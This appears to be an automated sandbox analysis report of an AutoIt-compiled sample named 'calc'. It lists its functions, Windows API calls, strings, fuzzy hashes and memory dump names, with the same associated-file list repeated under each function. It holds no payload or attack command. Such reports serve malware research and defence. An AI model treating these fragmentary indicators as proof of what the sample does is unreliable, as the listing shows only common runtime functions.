Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CloseFindFreeLibrarySendStringUnregister
String ID: close all$su
API String ID: 3080552100-2605719165
Opcode ID: b9280a75a0d9f507fc8712bebc7b43ef7d74a75ebad66014674356505a84a988
Instruction ID: 3646f2384ccb1e0e64c597d038a8f1cfb5bbf3df6652e1d2dd11040289734faa
Opcode Fuzzy Hash: b9280a75a0d9f507fc8712bebc7b43ef7d74a75ebad66014674356505a84a988
Instruction Fuzzy Hash: 4F712F312401589BDB31BF26DC81AED7766AF91315F40017FF8099B172CF395E9ADA48

Function 004200F5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

OnAutoItStart, xrefs: 00420148

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: LoadString
String ID: OnAutoItStart
API String ID: 2948472770-779282396
Opcode ID: b7450ae3f2511fa549ad06ec8c8ef8b57f7694bac96b9a24d91e34451de1bce3
Instruction ID: 596ddb237f3c4dbc422733f4dbf707e667353c10c10091e38a87b0e8f6c63aa8
Opcode Fuzzy Hash: b7450ae3f2511fa549ad06ec8c8ef8b57f7694bac96b9a24d91e34451de1bce3
Instruction Fuzzy Hash: 0C410471B04229ABC715DB74AC84AFFB7ECFB05308F50412BE415D3243EB68AD1687A9

Function 00401371 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,?), ref: 0040139F
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 004013C0
ShowWindow.USER32(00000000), ref: 004013D4
ShowWindow.USER32(00000000), ref: 004013DD

Strings

edit, xrefs: 004013BA
AutoIt v3, xrefs: 00401397, 0040139C, 0040139D

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 50910c52fbc06293d40c549713fca855e76ea37ac9ada999b4250cc0ee2bbbe8
Instruction ID: c1bcc58241d8bb41d686f4cc75eac745dfcef030c9692a37be27f8a629f86a69
Opcode Fuzzy Hash: 50910c52fbc06293d40c549713fca855e76ea37ac9ada999b4250cc0ee2bbbe8
Instruction Fuzzy Hash: D5F03AB11463747AE6321B536C08EEB2E5DEF867B9F110421F90892160E2A55950CAF9

Function 0044ADFD Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 13
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(mscoree.dll,0044AF6B,?,0045B120,00000008,0044AFA2,?,00000001,00000000,00454705,00000003), ref: 0044AE02
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044AE12
ExitProcess.KERNEL32 ref: 0044AE26

Strings

CorExitProcess, xrefs: 0044AE0C
mscoree.dll, xrefs: 0044ADFD
`su, xrefs: 0044AE02

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressExitHandleModuleProcProcess
String ID: CorExitProcess$`su$mscoree.dll
API String ID: 75539706-2740373599
Opcode ID: b17e66e1c60e703c919b077964af005c51aeddcd4bd0fbb943e394ff849fcc91
Instruction ID: 53a9ad44f3a9e6b916fa28b3adb372b4395d43277910e5f1d752cbfe1555cb17
Opcode Fuzzy Hash: b17e66e1c60e703c919b077964af005c51aeddcd4bd0fbb943e394ff849fcc91
Instruction Fuzzy Hash: CBD0C930280701FBEF405B719C0AA2B7A68FE44B47F108C75B819D8263CB78CC10DA2E

Function 00455359 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 247fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(80000000,80000000,00000000,0000000C,00000001,00000080,00000000,00000001,00000000,00000000), ref: 00455536
GetFileType.KERNEL32(00000000), ref: 00455543
CloseHandle.KERNEL32(00000000), ref: 0045554E
GetLastError.KERNEL32 ref: 00455554

Strings

H, xrefs: 004555A3

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastType
String ID: H
API String ID: 1809617866-2852464175
Opcode ID: 5ce06f682877ec76a1bbaac30100a30f596ab4e7cb3384c2f439e5053bbd4e01
Instruction ID: 3dea303bc14a8af4d4d0b503b19b291cd52b6a6c41b7bea232f97b06bbe31069
Opcode Fuzzy Hash: 5ce06f682877ec76a1bbaac30100a30f596ab4e7cb3384c2f439e5053bbd4e01
Instruction Fuzzy Hash: 02810671804A49AAEF218B94C8653BF7B70AF0231BF24415BEC51A72D3D77C498DCB5A

Function 00455BA1 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 247fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(80000000,80000000,0046270C,0000000C,00000001,00000080,00000000,?,00000000,00000000), ref: 00455D7E
GetFileType.KERNEL32(00000000), ref: 00455D8B
CloseHandle.KERNEL32(00000000), ref: 00455D96
GetLastError.KERNEL32 ref: 00455D9C

Strings

H, xrefs: 00455DEB

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastType
String ID: H
API String ID: 1809617866-2852464175
Opcode ID: aefb27ce640e5ec0de87e9abf81864acf92e705f4e30c285089214354cd5a602
Instruction ID: 18fb0dc3de688eab9ec8008dfc50e8359a27c51e16112c87510f03193277da9b
Opcode Fuzzy Hash: aefb27ce640e5ec0de87e9abf81864acf92e705f4e30c285089214354cd5a602
Instruction Fuzzy Hash: 5D812471804B499AEF228B98C8693BE7B709F0231AF24415BEC51A72D3C77D4A4DC75A

Function 0041629F Relevance: 7.5, APIs: 5, Instructions: 32serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,00479E08,?,0040119C,?,?), ref: 004162B3
LockServiceDatabase.ADVAPI32(00000000,?,0040119C,?,?), ref: 004162C0
UnlockServiceDatabase.ADVAPI32(00000000,?,0040119C,?,?), ref: 004162CB
CloseServiceHandle.ADVAPI32(00000000,?,0040119C,?,?), ref: 004162E3

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Service$Database$CloseHandleLockManagerOpenUnlock
String ID:
API String ID: 3647510317-0
Opcode ID: 377cb6a1556d2c0b34a69d2726eb7eac8501c5ce8fbfca6eb216596d4b31a9b1
Instruction ID: 43232d2ce80c1354198d9eaea2583da01791e04a0cef509c89e940ee515f7624
Opcode Fuzzy Hash: 377cb6a1556d2c0b34a69d2726eb7eac8501c5ce8fbfca6eb216596d4b31a9b1
Instruction Fuzzy Hash: 49E06D769422209BCB202BB0ACCC9DF3B59A70621371618B2F54292291C729CCC6A66C

Function 00401904 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(uxtheme.dll,00401884), ref: 0040190F
GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 00401921

Strings

uxtheme.dll, xrefs: 0040190A
IsThemeActive, xrefs: 0040191B

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: IsThemeActive$uxtheme.dll
API String ID: 2574300362-3542929980
Opcode ID: ed6c78d227b817cdbed870c23739e6fb2758cfda5514cb43d7da1eea0dd35e15
Instruction ID: eea2efce3837e0203db1cb3c4d5c02faa46c89d2bfa5e81eac7c0935e43c98e4
Opcode Fuzzy Hash: ed6c78d227b817cdbed870c23739e6fb2758cfda5514cb43d7da1eea0dd35e15
Instruction Fuzzy Hash: 4ED0C9B1540702EECB205F61C8897127AE8BB14703F20987BF88AE26A1E778D644CA1C

Function 0044FF81 Relevance: 6.2, APIs: 4, Instructions: 168fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000003), ref: 0044FFFB
GetLastError.KERNEL32 ref: 00450005
ReadFile.KERNEL32(?,?,00000001,00000000,00000000), ref: 004500CE
GetLastError.KERNEL32 ref: 004500D8

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 106ceec12e824d1f921699dafc9b08d4ae01bbaa5a8b869dbfd030dde0547a2e
Instruction ID: 6471931987010d01bcf4aa760061fc4daebf1b9b9bd924f830c326e67dc1cfed
Opcode Fuzzy Hash: 106ceec12e824d1f921699dafc9b08d4ae01bbaa5a8b869dbfd030dde0547a2e
Instruction Fuzzy Hash: DE61B5389047859FDB218F58C884BAE7BF0AF02316F14419BEC658B393D779D949CB1A

Function 00442D0D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 00442D41

Strings

EA05, xrefs: 00442DE6
AU3!, xrefs: 00442D3B

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: _strcat
String ID: AU3!$EA05
API String ID: 1765576173-125543416
Opcode ID: 17153ac72172eb9a604a519bf3944ddec50a013f6248d7b1dea916bafee717f8
Instruction ID: 29d5f5a1b1809eb385cd818f5a50e58fa9f1bd2989d91b3669fe8a792949b4ba
Opcode Fuzzy Hash: 17153ac72172eb9a604a519bf3944ddec50a013f6248d7b1dea916bafee717f8
Instruction Fuzzy Hash: 70218F71D402086AFB11DAA8CD46FEE3BA9AF44308F6408AFF141E7183E5F49244876A

Function 0044FEA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

__getbuf.LIBCMT ref: 0044FED4

Strings

pYF, xrefs: 0044FF26
o-D, xrefs: 0044FEA0

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: __getbuf
String ID: o-D$pYF
API String ID: 554500569-2041862546
Opcode ID: 43c3c69ad03a229e1e8eb7df82381eef4f8a4a41fcf0637eb458d4d674484f8b
Instruction ID: 45ab4429e61f8382d5639e8b3e42171f035d9681ef4c197fd688d929c02a0895
Opcode Fuzzy Hash: 43c3c69ad03a229e1e8eb7df82381eef4f8a4a41fcf0637eb458d4d674484f8b
Instruction Fuzzy Hash: FD219331414B018FE7348E29C450763B7E1AF56374B248A2FE4F6877D2D739A84E8B48

Function 0044FAF0 Relevance: 4.6, APIs: 3, Instructions: 146fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001), ref: 0044FBE0

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 2232f439ec6bcbb526f72077e2e8a9aff7e1540724577345c53341a595c8efdf
Instruction ID: 70d429ee7121439abd4bc97c56a079324356a00733651e9dd73cd6a5f99de41e
Opcode Fuzzy Hash: 2232f439ec6bcbb526f72077e2e8a9aff7e1540724577345c53341a595c8efdf
Instruction Fuzzy Hash: E5514E71900248CFEF25DFA8C984AADBBB8FF0A305F24056EE8559B252D7349909CB19

Function 00414E97 Relevance: 4.6, APIs: 3, Instructions: 75COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 00414EB8
SHGetDesktopFolder.SHELL32(?), ref: 00414ED7
SHGetPathFromIDListW.SHELL32(?,?), ref: 00414F0D

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: DesktopFolderFromListMallocPath
String ID:
API String ID: 2281215042-0
Opcode ID: fd54a320faa334825c183696fc3281f20257b6f4e8e051d3b8ff61a2d48e6b5c
Instruction ID: 420e6610a152b6402536c0acf94c904dc319534d543c5730a20390f59e048e41
Opcode Fuzzy Hash: fd54a320faa334825c183696fc3281f20257b6f4e8e051d3b8ff61a2d48e6b5c
Instruction Fuzzy Hash: 44218C76900219ABDB10DFA0D888EDEB7B9AF48710F10409AF9059B290DB35EE45CB58

Function 00401852 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00401904: LoadLibraryA.KERNEL32(uxtheme.dll,00401884), ref: 0040190F
Part of subcall function 00401904: GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 00401921

FreeLibrary.KERNEL32(?,0047BCF4,?), ref: 004018E0

Strings

su, xrefs: 004018E0

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: su
API String ID: 145871493-45427494
Opcode ID: afee0c295e40e99ab34158f1244b547d01bcead8f6ed44e632cc355ff5b29751
Instruction ID: 01922d125a099be2173beefaa94b615fd73c8a70fa8edead01576b879d90f1d3
Opcode Fuzzy Hash: afee0c295e40e99ab34158f1244b547d01bcead8f6ed44e632cc355ff5b29751
Instruction Fuzzy Hash: 9F0140B2D04204AFD701BFAAAC0159DBBE4EB94708B10C07BF904E3261D7B85A40DB5E

Function 00442C1C Relevance: 3.1, APIs: 2, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 004168A2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0045C6D0,?,?,?,00442C32,00000000,0045C6D0), ref: 004168CE

Part of subcall function 004168A2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00442C32,00000000,0045C6D0), ref: 004168F0

_strcat.LIBCMT ref: 00442C49
_strcat.LIBCMT ref: 00442C56

Part of subcall function 00442A91: _strlen.LIBCMT ref: 00442A99

Part of subcall function 00442D0D: _strcat.LIBCMT ref: 00442D41

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: _strcat$ByteCharMultiWide$_strlen
String ID:
API String ID: 1312754939-0
Opcode ID: 3712e034746cfa9d275968536f5e73e61f62d0093438a87d15a237fa94b18d45
Instruction ID: b0cc53737743a3ac0a727fc92c25a37191f4a65ad63c267f3757994ee01627ef
Opcode Fuzzy Hash: 3712e034746cfa9d275968536f5e73e61f62d0093438a87d15a237fa94b18d45
Instruction Fuzzy Hash: 96219DB29105242FFB20BB768C82B9EB79CFF01318F50896FF465D2182EB7CD9104699

Function 0044F7F5 Relevance: 3.0, APIs: 2, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00000000,00000000,00000000,?,?,?,0044F8C0,?,00000000,0044EFF8,0045B9B8,0000000C,0044CCA9,?,00000000,00000002), ref: 0044F822
GetLastError.KERNEL32 ref: 0044F82F

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: ef301333862fd523fcfef0701836ec2e687ab67301aea6ab59806455b9707fa4
Instruction ID: f4beb2f81c7b533093f19090f57eb703413f6fe32cdcc2261b4f7d7860460413
Opcode Fuzzy Hash: ef301333862fd523fcfef0701836ec2e687ab67301aea6ab59806455b9707fa4
Instruction Fuzzy Hash: 6101F4326046215AEB106F3CFC0895E37649B81331F120B6AF171CF2E2DF34CC458269

Function 00449C88 Relevance: 3.0, APIs: 2, Instructions: 35memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00449CA6

Part of subcall function 0044C6DB: RtlEnterCriticalSection.NTDLL(?), ref: 0044C703

RtlFreeHeap.NTDLL(00000000,?,0045B078,0000000C,0044C6BF,00000000,0045B3A0,00000008,0044C6F4,?,?,?,00449A5F,00000004,0045B068,0000000C), ref: 00449CED

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CriticalEnterFreeHeapSection__lock
String ID:
API String ID: 3012239193-0
Opcode ID: cf883bd2fe04d4a07ca51566a703a3cd097dd1853a5e94b071277c6f3932a8ef
